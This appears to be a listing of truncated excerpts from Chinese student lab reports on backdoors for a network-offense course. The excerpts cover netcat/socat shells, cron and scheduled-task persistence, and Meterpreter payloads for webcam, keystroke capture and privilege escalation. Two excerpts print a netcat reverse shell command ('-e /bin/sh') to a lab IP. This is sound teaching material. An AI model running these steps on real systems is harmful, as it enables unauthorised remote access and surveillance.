20165310 NetSec Exp2后门原理与实践 一.基础问题 例举你能想到的一个后门进入到你系统中的可能方式? 网页木马等访问网页导致 下载非官方源软件 随意下载邮件中不明程序等 例举你知道的后门如何启动起来(win及linux)的方式? 修改注册表,使后门进行自启动 制定定时启动 Meterpreter有哪些给你映像深刻的功能? msfconsole真是太好看了 生成后门程序并且传输给目标电脑,连接控制 如何发现自己有系统有没有被安装后门? 查看进程,是否有异常进程 查看注册表是否被修…
Exp2 后门原理与实践 实验内容 一.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过访问钓鱼网站,无意下载了一些图片或是文件.而这个图片或文件中携带后门. 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:对于Windows来说: 用户执行了带有后门的可执行文件 开机自启动技术 win的定时服务 对于linux来说: cron设置在一个指定的时间启动后门 通过命令行执行了一个捆绑有后门的可执行文件 3.Meterpreter有哪些给你印象深刻的功…
20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows Shell 2.3 使用nc传输数据 2.4 使用ncat实现文件传输 三.实验内容 3.1 使用netcat获取主机操作Shell,cron启动 3.2 使用socat获取主机操作Shell, 任务计划启动 3.3 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行…
2018-2019 2 20165203 <网络对抗技术> Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0.5分) 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分)…
20155210 Exp2 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP 如图: 然后使用ncat.exe程序,ncat.exe -l -p 5210监听本机的5210端口 在kali端,使用nc指令的-e选项,nc 192.168.43.217(主机ip) 5210(所设置的端口) -e /bin/sh反向连接Windows主机的5210端口: 如图: 随后在windows端,就可以使用kali的命令行了 如…
20155226 Exp2 后门原理与实践 第一次实验博客交了蓝墨云未在博客园提交,链接 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP 如图: 然后使用ncat.exe程序,ncat.exe -l -p 5226监听本机的5226端口 在kali端,使用nc指令的-e选项,nc 192.168.56.1(主机ip) 5226(所设置的端口) -e /bin/sh反向连接Windows主机的5226端口: 如图: 随后在wind…
20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(win及linux)的方式? 更改注册表,自启动方式. 跟正常的软件捆绑起来 3.Meterpreter有哪些给你映像深刻的功能? 击键记录还有获取摄像头权限进行拍照.击键记录可以在这段时间内截获到你写的内容或者数据,如果是机密性的东西,就很麻烦了..获取摄像头权限有种被监视的感觉.... 4.如何发现自己有系统…
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其他软件)生成获取目标…
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Windows下,先使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的5324端口: 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5324端口: Windows下成功获得了一个Kali的shell,运行ls指令如下: Linux获得Windows Shell 过程与之…
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 二.基础知识 Kali地址:192.168.153.134 Wi…